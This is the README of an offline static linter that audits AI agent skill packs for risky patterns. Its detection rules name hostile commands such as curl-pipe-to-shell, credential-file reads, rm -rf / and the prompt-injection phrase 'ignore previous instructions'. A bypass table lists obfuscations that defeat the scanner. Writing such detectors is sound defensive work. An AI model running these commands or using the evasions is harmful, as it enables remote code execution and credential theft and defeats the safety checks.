SkillOps Forge

English · 中文

Static lint + risk-hint auditor for AI Agent skill packs. Offline CLI for SKILL.md, CLAUDE.md, and .cursor/rules/*.mdc — 19 plaintext-pattern security rules + 27 audit rules, zero LLM, zero subprocess.

Why another tool?

The skill ecosystem already has structural linters and quality scorers. None of them treat AI-era attack surfaces — agent memory exfiltration, identity-file reads, prompt-injection keywords, hidden zero-width payloads — as first-class detections.

| Tool | Form | Focus | Security rules | Offline | LLM-era checks |
| --- | --- | --- | --- | --- | --- |
| `skilllint` | CLI | structural lint, cross-platform | partial (pattern-level) | ✓ | ✗ |
| `skill-tester` | CLI | AST + sample exec + quality scoring | ✗ | ✓ | ✗ |
| `skillcheck` | CLI | frontmatter-only validator | ✗ | ✓ | ✗ |
| `claude-skill-check` | GH Action | secrets in skill body | 7 secret patterns | ✓ | ✗ |
| `kevinsong0/skills-vetter` | Prompt skill | LLM-driven vetting | qualitative | ✗ (needs LLM) | partial |
| `skillops-forge` | CLI + GH Action | lint + plaintext-pattern security hint + score + report | 19 plaintext rules | ✓ | ✓ |

SkillOps Forge ships dedicated rules for agent-private files (MEMORY.md, USER.md, SOUL.md, IDENTITY.md, ~/.workbuddy/memory), combined with an auditor, a deterministic scorer, a CRITICAL-veto policy, and self-contained HTML/Markdown/JSON reports.

Disclaimer. Risk-assistance only. A passing score reduces obvious failure modes; it does not certify safety. Read the Limitations section below before relying on this tool as a security gate.

Limitations

SkillOps Forge is a plaintext-pattern static linter, not a full security solution. It has been tested under adversarial conditions; here is what it can and cannot do, in plain terms:

What it does well

Catches plaintext occurrences of the 19 documented patterns (curl | sh, sudo, eval(, ~/.ssh/id_rsa, MEMORY.md references, etc.) when the attacker writes them in the canonical, unobfuscated form.
Surfaces structural and naming issues in skill packs (frontmatter schema, kebab-case names, token budgets, missing trigger phrases).
Generates deterministic, machine-readable reports that are stable enough to use as PR-blocking CI gates for honest authors.

What it does not do — bypass scenarios we verified

The following techniques defeat SkillOps Forge today:

| Bypass | What slips through |
| --- | --- |
| Unicode confusables (`ѕudo` with Cyrillic `ѕ` U+0455) | SEC-006 misses; only SEC-005 may catch the trailing `rm` |
| `bash -c "$(curl …)"` instead of `curl … \| sh` | SEC-001 misses; only SEC-010 medium domain hint fires |
| `curl -o /tmp/x && sh /tmp/x` (download-then-execute) | SEC-001 misses |
| `python -c "exec(urlopen(...).read())"` | SEC-001 misses |
| `__import__("builtins").exec(payload)` | SEC-014 misses; SEC-018 catches it |
| `getattr(__builtins__, 'ev'+'al')(payload)` | SEC-014 misses; SEC-018 + SEC-019 catch it |
| Base64-encoded payload split across two strings | SEC-008 / SEC-013 miss unless one half is long enough on its own |

The fundamental constraint: regex-based plaintext scanning cannot read intent. Determined attackers can always reach an obfuscation layer that defeats finite pattern sets. SEC-018 and SEC-019 (added in 0.2.1) close the two most common reflection / string-concat bypasses, but the list is not exhaustive and never will be.
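To make the constraint concrete, here is a minimal sketch of how two of the bypasses above slip past a plaintext pattern. The two regexes are hypothetical stand-ins written for this illustration, not the patterns SkillOps Forge ships, and `example.invalid` is a placeholder host.

```python
import re
import unicodedata

# Hypothetical stand-ins for two plaintext rules; the shipped patterns may differ.
SUDO_RULE = re.compile(r"\bsudo\b")
PIPE_TO_SHELL_RULE = re.compile(r"\bcurl\b[^|\n]*\|\s*(?:ba)?sh\b")


def matches_any_rule(text: str) -> bool:
    """Return True if either illustrative pattern fires on the text."""
    return bool(SUDO_RULE.search(text) or PIPE_TO_SHELL_RULE.search(text))


SAMPLES = {
    "canonical sudo": "sudo rm -rf /tmp/cache",
    # Cyrillic U+0455 replaces the Latin "s", so the literal "sudo" never appears.
    "confusable sudo": "\u0455udo rm -rf /tmp/cache",
    "canonical pipe": "curl https://example.invalid/install.sh | sh",
    # Same effect as the pipe form, but there is no "|" for the pattern to anchor on.
    "command substitution": 'bash -c "$(curl https://example.invalid/install.sh)"',
}

for label, text in SAMPLES.items():
    print(f"{label:<22} matched={matches_any_rule(text)}")

# Compatibility normalization does not help: NFKC leaves U+0455 unchanged.
print(unicodedata.normalize("NFKC", "\u0455") == "s")
```

Both canonical forms match and both rewritten forms do not, which is why each new pattern only narrows the gap rather than closing it.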

Out of scope

AGENTS.md / Codex agents.json files — not parsed.
Python AST / runtime sample execution — not implemented (red line: no subprocess, no LLM, no untrusted code execution).
Network reputation lookup of domains in skill bodies — fully offline.
Cryptographic signature verification of skill packs — not implemented.

We will keep growing the bypass coverage in future releases and explicitly list each new defense + each known limitation in CHANGELOG.md.

Quick Start (30 seconds)

# from source (until PyPI release)
pip install -e ".[dev]"

# verify install
skillops --help          # 5 commands: scan / init-ci / version / rules / rule
skillops version         # skillops-forge 0.2.1

# scan a skill (or a whole skill repo)
skillops scan ./my-skill --report all

# bootstrap a CI workflow that fails the PR if score drops below 70
skillops init-ci --github-actions

Reports land in ./reports/ by default:

| File | Purpose |
| --- | --- |
| `reports/skillops-report.html` | Self-contained HTML (drop into a README, share as artifact) |
| `reports/skillops-report.md` | Markdown summary (PR comment friendly) |
| `reports/skillops-result.json` | Machine-readable, schema-stable (CI artifact) |

CLI

skillops scan PATH [--report md|html|json|all] [--out-dir DIR]
                   [--threshold 70] [--no-cursor-rules] [--no-runner] [-v]
skillops init-ci [--github-actions / --no-github-actions]
                 [--out FILE] [--force]
skillops version

Exit codes:

| Code | Meaning |
| --- | --- |
| 0 | Pass (score ≥ threshold AND zero CRITICAL findings) |
| 1 | Audit failed (below threshold or any CRITICAL finding) |
| 2 | User error (bad path, bad arguments) |
| 3 | Internal error (rare; malformed YAML now degrades to a finding) |
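The pass/fail half of that table can be expressed as a small decision function. This is a sketch under assumptions: `ExitCode` and `audit_exit_code` are hypothetical names chosen for illustration, and codes 2 and 3 are listed only for completeness because they arise from argument handling and unexpected errors rather than from the audit result.

```python
from enum import IntEnum


class ExitCode(IntEnum):
    """Exit codes as documented in the table above (names are illustrative)."""
    PASS = 0
    AUDIT_FAILED = 1
    USER_ERROR = 2
    INTERNAL_ERROR = 3


def audit_exit_code(score: int, critical_count: int, threshold: int = 70) -> ExitCode:
    """Map an audit result to 0 or 1: any CRITICAL finding fails, as does a low score."""
    if critical_count > 0 or score < threshold:
        return ExitCode.AUDIT_FAILED
    return ExitCode.PASS


print(int(audit_exit_code(score=88, critical_count=0)))  # passes both conditions
print(int(audit_exit_code(score=88, critical_count=1)))  # vetoed by the CRITICAL finding
print(int(audit_exit_code(score=64, critical_count=0)))  # below the default threshold
```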

What gets checked

19 security rules (SEC-001 → SEC-019)

| ID | Severity | Detection |
| --- | --- | --- |
| SEC-001 | critical | Remote script piped to shell (`curl … \| sh`) |
| SEC-002 | high | Download-then-execute (`wget -O … && bash`) |
| SEC-003 | critical | Sensitive credential file path (`~/.ssh`, `~/.aws`, `id_rsa`, `.netrc`) |
| SEC-004 | high | Implicit credential env-var read (`AWS_*`, `OPENAI_API_KEY`, `GITHUB_TOKEN`) |
| SEC-005 | critical | Destructive shell command (`rm -rf /`, `dd if=`, `mkfs`, fork bomb) |
| SEC-006 | high | Privilege escalation (`sudo`, `chmod 777`, `chown -R root`) |
| SEC-007 | high | Hidden zero-width characters (U+200B/200C/200D/FEFF) |
| SEC-008 | medium | Long base64 / high-entropy blob (heuristic) |
| SEC-009 | high | Prompt-injection keyword (`ignore previous instructions`, `jailbreak`) |
| SEC-010 | medium | Exfiltration to non-allowlisted domain |
| SEC-011 | high | Shell injection via unsanitized variable |
| SEC-012 | critical | Agent identity / memory file access (`MEMORY.md`, `USER.md`, `SOUL.md`, `IDENTITY.md`, `CLAUDE.md`, `~/.workbuddy/memory`) |
| SEC-013 | high | Base64 / hex decode action (`base64 -d`, `atob(`, `fromCharCode`) |
| SEC-014 | high | Dynamic execution (`eval(`, `exec(`, `Function(...)`) |
| SEC-015 | high | Network call to a raw IPv4 address |
| SEC-016 | critical | Browser cookie / Login Data / saved-credential access |
| SEC-017 | high | Writes to system / privileged paths (`/etc`, `/usr`, `C:\Windows`) |
| SEC-018 | high | Reflective dynamic execution (`getattr(__builtins__, ...)`, `__import__("builtins").exec`) |
| SEC-019 | high | String-concatenated `eval` / `exec` / `compile` name (e.g. `'ev'+'al'`) |
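As an illustration of what a single rule amounts to, the sketch below scans text for the four code points listed under SEC-007. It is not the shipped rule (those are YAML data under `rules/`); `find_zero_width` and its tuple output are assumptions made for this example.

```python
# The four code points named in the SEC-007 row.
ZERO_WIDTH = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
}


def find_zero_width(text: str) -> list[tuple[int, int, str]]:
    """Return (line, column, code point) for every hidden character, 1-indexed."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in ZERO_WIDTH:
                findings.append((line_no, col, f"U+{ord(ch):04X}"))
    return findings


skill_body = "run\u200b this step\nthen stop\ufeff"
for line_no, col, code_point in find_zero_width(skill_body):
    print(f"line {line_no}, col {col}: {code_point}")
```

Reporting the position matters here because the offending character is invisible in most editors and diff views.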

Structural audit (auditor)

The auditor checks five areas: frontmatter (required and recommended fields), description (length and trigger phrasing), permissions (declared allowed-tools versus detected shell usage), io_schema (Inputs / Outputs sections), and examples (at least one fenced block, runnable).

Runner

Examples are interpreted, never executed. The runner uses shlex plus a strict allow / deny list, and the test suite asserts subprocess.run, Popen, check_call, and check_output are never invoked.
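A rough sketch of that interpret-only approach follows. The allow and deny sets, the `dry_run` function, and the verdict strings are all hypothetical; the real runner's lists and output format are not shown in this README. Nothing in the sketch spawns a process.

```python
import shlex

# Hypothetical lists for illustration; the shipped allow / deny lists may differ.
DENY_COMMANDS = {"sudo", "rm", "dd", "mkfs"}
ALLOW_COMMANDS = {"echo", "ls", "cat", "skillops"}
SHELL_NAMES = {"sh", "bash", "zsh"}


def dry_run(command: str) -> str:
    """Classify an example command by tokenizing it; the command is never executed."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        # shlex raises ValueError on unbalanced quotes.
        return "unparseable"
    if not tokens:
        return "empty"
    # A "|" token followed by a shell name means remote or local text is piped to a shell.
    for current, following in zip(tokens, tokens[1:]):
        if current == "|" and following in SHELL_NAMES:
            return "blocked: pipe to shell"
    if tokens[0] in DENY_COMMANDS:
        return "blocked: denied command"
    if tokens[0] in ALLOW_COMMANDS:
        return "allowed"
    return "unknown: needs review"


for example in (
    "echo hello",
    "sudo ls /root",
    "curl https://example.invalid/install.sh | sh",
    'echo "unterminated',
):
    print(f"{example!r} -> {dry_run(example)}")
```

One known gap in this sketch: `shlex.split` only isolates `|` when it is surrounded by whitespace, so `curl x|sh` would need a tokenizer that treats punctuation as its own token.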

Reports

Each report includes (since 0.1.2):

Score / Risk / Threshold / Result — with a ⚠️ PASSED WITH CAUTION middle state when score ≥ threshold but a HIGH finding exists.
Recommended Action — risk-tier-mapped guidance (e.g. CRITICAL → “DO NOT INSTALL. Address all critical findings first.”).
Permissions Summary — auto-extracted Files Read / Files Write / Commands / Network from the skill body and examples.
Inventory / Findings / Examples Dry-Run / Compliance Checklist.

Scoring

score = max(0, 100 - Σ(weight × count))
weights: critical=25, high=12, medium=5, low=2, info=0

A single CRITICAL finding sets is_passed = false regardless of score (one-vote veto). The CRITICAL veto applies to both audit_findings and security_findings; is_passed is a Pydantic v2 @computed_field so JSON, Markdown and HTML reports stay in sync automatically.
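The formula and the veto can be sketched in a few lines. This version uses a plain dataclass with properties rather than the Pydantic v2 model the project describes, and `ScoreCard`, `counts`, and `verdict` are hypothetical names; the middle verdict follows the PASSED WITH CAUTION state described under Reports.

```python
from dataclasses import dataclass, field

# Weights as documented above.
WEIGHTS = {"critical": 25, "high": 12, "medium": 5, "low": 2, "info": 0}


@dataclass
class ScoreCard:
    """Illustrative stand-in for the scorer; not the project's actual model."""
    counts: dict = field(default_factory=dict)  # severity -> number of findings
    threshold: int = 70

    @property
    def score(self) -> int:
        penalty = sum(WEIGHTS[severity] * n for severity, n in self.counts.items())
        return max(0, 100 - penalty)

    @property
    def is_passed(self) -> bool:
        # One CRITICAL finding vetoes the result regardless of score.
        return self.counts.get("critical", 0) == 0 and self.score >= self.threshold

    @property
    def verdict(self) -> str:
        if not self.is_passed:
            return "FAILED"
        if self.counts.get("high", 0) > 0:
            return "PASSED WITH CAUTION"
        return "PASSED"


for counts in ({"medium": 2, "low": 1}, {"high": 1, "medium": 2}, {"critical": 1}):
    card = ScoreCard(counts=counts)
    print(counts, card.score, card.verdict)
```

The last case is the one the veto exists for: a single CRITICAL finding costs only 25 points, leaving a score of 75 that would clear the default threshold of 70 without the veto.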

CI in one line

skillops init-ci --github-actions

Generates .github/workflows/skillops.yml with pinned actions/checkout@v4 and actions/setup-python@v5, an artifact upload, and a fail-under threshold (default 70). Default policy refuses to overwrite an existing workflow; pass --force to replace it.

Real-world example

Running SkillOps Forge against 37 skills installed on a developer machine (~/.workbuddy/skills/) surfaced two true-positive CRITICAL findings:

| Skill | Finding | Evidence |
| --- | --- | --- |
| `proactive-agent` | SEC-012 × 2 | `Read SOUL.md` / `Read USER.md` (lines 499–500) |
| `humanizer` | AUD-000 (CRITICAL) | Multi-line YAML description without quoting (parser degrades gracefully instead of crashing) |

The full distribution: 2 critical · 1 high · 3 medium · 9 low · 22 info. See CHANGELOG.md (entries [0.1.2], [0.1.4], [0.2.0], [0.2.1]) for the rule-by-rule rationale and the prior-art credits to skilllint and skillcheck.

Design red lines

Never subprocess — the runner has zero subprocess import; tests monkey-patch and assert non-invocation.
Fully offline — no network calls (not even GitHub API); init-ci only writes a template file.
Never upload user content — every byte of analysis stays local.
Never execute risky commands — examples are interpreted via shlex plus an allow / deny list; curl … | sh is intercepted.
Risk-assistance, not certification — explicit disclaimer in every report.

Project layout

skillops-forge/
├── src/skillops_forge/
│   ├── parser/        # SKILL.md / CLAUDE.md / .cursor/rules
│   ├── auditor/       # frontmatter / description / permissions / io / examples
│   ├── scanner/       # rule loader + dedup engine
│   ├── runner/        # shlex-based dry-run, never subprocess
│   ├── reporter/      # md / html / json + scoring
│   ├── pipeline.py    # parser → audit → scan → run → score → report
│   ├── plugins/       # PluginProtocol (P1: LLM judge, cross-format export)
│   ├── rules/         # YAML data-driven SEC rules
│   ├── templates/     # Jinja2 (HTML/MD reports + GH Actions yaml)
│   └── ci/            # init-ci generator
├── tests/             # 206 tests, 91% line coverage (scanner ≥95%)
├── docs/              # architecture, rules, JSON schema, mermaid diagrams
└── pyproject.toml

License

MIT · For the Chinese version, see README_CN.md.
